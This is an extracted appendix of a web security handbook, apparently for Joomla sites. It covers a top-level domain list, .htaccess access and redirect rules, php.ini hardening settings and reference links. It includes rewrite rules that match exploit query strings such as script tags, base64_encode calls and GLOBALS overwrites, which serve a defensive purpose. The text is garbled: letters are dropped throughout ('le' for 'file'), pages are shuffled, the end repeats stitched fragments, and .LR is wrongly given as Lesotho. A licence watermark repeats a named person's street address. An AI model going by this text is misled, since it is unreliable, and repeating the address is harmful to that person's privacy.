Appendix [ 227 ] .IL Israel—Internet Society of Israel .IM Isle of Man—Isle of Man Government .IN India .INFO Generic— Generic top-level domain .INT Used only for registering organizations established by international treaties between governments—Internet Assigned Numbers Authority .IO British Indian Ocean Territory .IO Top Level Domain Registry .IQ Iraq—National Communications and Media—Commission of Iraq .IR Iran, Islamic Republic of—Institute for Studies in Theoretical Physics & Mathematics (IPM) .IS Iceland .IT Italy .JE Jersey .JM Jamaica .JO Jordan .JOBS Reserved for human resource managers .JP Japan .KE Kenya .KG Kyrgyzstan .KH Cambodia .KI Kiribati .KM Comoros .KN Saint Kitts and Nevis .KP Korea, Democratic People's Republic of .KR Korea, Republic of—National Internet Development Agency of Korea .KW Kuwait—Ministry of Communications .KY Cayman Islands—The Information and Communications Technology Authority .KZ Kazakhstan—Association of IT Companies of Kazakhstan .LA Lao People's Democratic Republic .LB Lebanon .LC Saint Lucia .LI Liechtenstein This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 Security Handbook [ 228 ] .LK Sri Lanka .LK Domain Registrar .LR Lesotho .LT Lithuania .LU Luxembourg .LV Latvia .LY Libyan Arab Jamahiriya .MA Morocco .MC Monaco .MD Moldova .ME Montenegro .MF Saint Martin .MG Madagascar .MH Marshall Islands .MIL Reserved exclusively for the United States Military .MK Macedonia, The Former Yugoslav Republic of .ML Mali .MM Myanmar .MN Mongolia .MO Macao–University of Macau .MOBI Reserved for consumers and providers of mobile products and services .MP Northern Mariana Islands .MQ Martinique .MR Mauritania .MS Montserrat .MT Malta .MU Mauritius .MUSEUM Reserved for museums .MV Maldives .MW Malawi .MX Mexico .MY Malaysia .MZ Mozambique .NA Namibia .NAME Reserved for individuals This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 Appendix [ 229 ] .SC Seychelles .SD Sudan .SE Sweden .SG Singapore .SH Saint Helena .SI Slovenia .SJ Svalbard and Jan Mayen .SK Slovakia .SL Sierra Leone .SM San Marino .SN Senegal .SO Somalia .SR Suriname .ST Sao Tome and Principe .SU Soviet Union (being phased out) .SV El Salvador .SY Syrian Arab Republic .SZ Swaziland .TC Turks and Caicos Islands .TD Chad .TEL Reserved for businesses and individuals to publish contact data .TF French Southern Territories .TG Togo .NC New Caledonia .NE Niger .NET Generic top-level domain .NF Norfolk Island .NG Nigeria—Government c/o National Information Technology Development Agency (NITDA) .NI Nicaragua .NL Netherlands .NO Norway .NP Nepal .NR Nauru .NU Niue This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 Security Handbook [ 230 ] .NZ New Zealand .OM Oman .ORG Generic top-level domain .PA Panama .PE Peru .PF French Polynesia .PG Papua New Guinea .PH Philippines .PK Pakistan .PL Poland .PM Saint Pierre and Miquelon .PN Pitcairn .PR Puerto Rico .PRO Restricted to credentialed professionals and related entities .PS Palestinian Territory, Occupied .PT Portugal .PW Palau .PY Paraguay .QA Qatar .RE Reunion .RO Romania .RS Serbia .RU Russian Federation .RW Rwanda .SA Saudi Arabia .SB Solomon Islands .TH Thailand .TJ Tajikistan .TK Tokelau .TL Timor-Leste .TM Turkmenistan .TN Tunisia This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 Appendix [ 231 ] .TO Tonga .TP Portuguese Timor (being phased out) .TR Turkey .TRAVEL Reserved for entities whose primary area of activity is in the travel industry .TT Trinidad and Tobago .TV Tuvalu .TW Taiwan .TZ Tanzania, United Republic of .UA Ukraine .UG Uganda .UK United Kingdom .UM United States Minor Outlying Islands .US United States .UY Uruguay .UZ Uzbekistan .VA Holy See (Vatican City State) .VC Saint Vincent and the Grenadines .VE Venezuela .VG Virgin Islands, British .VI Virgin Islands, U.S. .VN Viet Nam .VU Vanuatu .WF Wallis and Futuna .WS Samoa .YE Yemen .YT Mayotte .YU Yugoslavia (being phased out) .ZA South Africa .ZM Zambia .ZW Zimbabwe This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 Security Handbook [ 232 ] List of Critical Settings Following is the list of critical settings regarding .htaccess and php.ini les: .htaccess Rule one: Password-protect a single le. # password-protect single file <Files secure.php> AuthType Basic AuthName "Prompt" AuthUserFile /home/path/.htpasswd Require valid-user </Files> Rule two: Use FilesMatch to password-protect multiple les. # password-protect multiple files <FilesMatch "^(execute|index|secure|insanity|biscuit)*$"> AuthType basic AuthName "Development" AuthUserFile /home/path/.htpasswd Require valid-user </FilesMatch> Rule three: Password-protect a directory, in this case the one containing .htaccess. # password-protect the directory in which this .htaccess rule resides AuthType basic AuthName "This directory is protected" AuthUserFile /home/path/.htpasswd AuthGroupFile /dev/null Require valid-user Rule Four: Password-protect against all IPs except the one you specify. # password-protect directory for every IP except the one specified # place in htaccess file of a directory to protect that entire directory AuthType Basic AuthName "Personal" AuthUserFile /home/path/.htpasswd Require valid-user Allow from 99.88.77.66 Satisfy Any This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 Appendix [ 233 ] # password prompt for visitors AuthType basic AuthName "This site is currently under construction" AuthUserFile /home/path/.htpasswd AuthGroupFile /dev/null Require valid-user # allow webmaster and any others open access Order Deny, Allow Deny from all # the allow from below could be your IP to make it easier to get in Allow from 111.222.33.4 Allow from favorite.validation/services/ Allow from googlebot.com Satisfy Any Activate SSL via .htaccess: # require SSL SSLOptions +StrictRequire SSLRequireSSL SSLRequire %{HTTP_HOST} eq "domain.tld" ErrorDocument 403 https://domain.tld # require SSL without mod_ssl RewriteCond %{HTTPS}! =on [NC] RewriteRule ^.*$ https://%{SERVER_NAME}%{REQUEST_URI} [R,L] Custom error page and error messages: # serve custom error pages ErrorDocument 400 /errors/400.html ErrorDocument 401 /errors/401.html ErrorDocument 403 /errors/403.html ErrorDocument 404 /errors/404.html ErrorDocument 500 /errors/500.html # provide a universal error document RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^.*$ /dir/error.php [L] # deny access to bad robots site rippers offline browsers RewriteBase / RewriteCond %{HTTP_USER_AGENT} ^Anarchie [OR] RewriteCond %{HTTP_USER_AGENT} ^ASPSeek [OR] RewriteCond %{HTTP_USER_AGENT} ^attach [OR] RewriteCond %{HTTP_USER_AGENT} ^autoemailspider [OR] This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 Security Handbook [ 234 ] RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR] RewriteCond %{HTTP_USER_AGENT} ^Xenu [OR] RewriteCond %{HTTP_USER_AGENT} ^Zeus.*Webster [OR] RewriteCond %{HTTP_USER_AGENT} ^Zeus RewriteRule ^.* - [F,L] # send visitor to site of your choice RewriteRule ^.*$ http://www.hellish-website.com [R,L] # send the bad guys to a virtual black hole of fake email addresses RewriteRule ^.*$ http://english-61925045732.spampoison.com [R,L] # stop hotlinking and serve alternate content <IfModule mod_rewrite.c> RewriteEngine on RewriteCond %{HTTP_REFERER} !^$ RewriteCond %{HTTP_REFERER} !^http://(www\.)?domain\.com/.*$ [NC] RewriteRule .*\.(gif|jpg)$ http://www.domain.com/donotsteal.jpg [R,NC,L] </ifModule> # block a partial domain via network/netmask values deny from 99.1.0.0/255.255.0.0 # block a single domain deny from 99.88.77.66 # Block two unique IP addresses deny from 99.88.77.66 11.22.33.44 # block three ranges of IP addresses deny from 99.88 99.88.77 11.22.33 In the following example, all IP addresses are allowed access except for 12.345.67.890 and domain.com: # allow all except those indicated here <Limit GET POST PUT> order allow,deny allow from all deny from 12.345.67.890 deny from .*domain\.com.* </Limit> # Disable directory browsing Options All –Indexes This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 Appendix [ 235 ] # prevent viewing of a specific file <files secretfile.doc> order allow, deny deny from all </files> # prevent display of select file types IndexIgnore *.wmv *.mp4 *.avi *.etc Make sure your .htaccess contains this entry: ########## Begin - Rewrite rules to block out some common exploits ## If you experience problems on your site block out the operations listed below ## This attempts to block the most common type of exploit `attempts` to Joomla! # Block out any script trying to set a mosConfig value through the URL RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR] # Block out any script trying to base64_encode crap to send via URL RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR] # Block out any script that includes a <script> tag in URL RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR] # Block out any script trying to set a PHP GLOBALS variable via URL RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR] # Block out any script trying to modify a _REQUEST variable via URL RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) # Send all blocked request to homepage with 403 Forbidden error! RewriteRule ^(.*)$ index.php [F,L] ########### End - Rewrite rules to block out some common exploits php. ini Settings you should make in your php.ini le: register_globals = off (or =0) allow_url_fopen = off dene( 'RG_EMULATION', 0 ) This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 Security Handbook [ 236 ] Turn off PHP version information: expose_php = 0 Disable le uploads (CAUTION: It may affect some extensions): le_uploads=off Prevent or lower the possibility of a session xation attack: session.use_trans_sid = off References to Learn More about php.ini http://shiflett.org: Chris is the author of PHP and Web Application Secutiry, a must read. http://perishablepress.com/press/2006/01/10/stupid-htaccess-tricks http://articles.techrepublic.com.com/5100-22-5268948.html http://phpsec.org/ General Apache Information This book is not for the hardcore Apache administrators. Included here are a few important directives that you might nd useful. If you have access to your Apache server, you can check your settings. If not, please consult your host. INCLUDES Options +Includes Turns on the capability to have SSI (Server Side Includes) in les. IncludesNOEXEC Options +IncludesNOEXEC This turns on the permission to use SSI. It prevents the use of #exec or someone using #include to load CGI programs. This is important to remove the bulk of risks associated with the Server Side Include attack. This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 . Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 Security Handbook [ 230 ] .NZ New Zealand .OM Oman .ORG Generic top-level domain .PA Panama .PE Peru .PF French Polynesia .PG. sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 Appendix [ 231 ] .TO Tonga .TP Portuguese Timor (being phased out) .TR Turkey .TRAVEL Reserved for entities. Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604 Security Handbook [ 232 ] List of Critical Settings Following is the list of critical settings regarding .htaccess and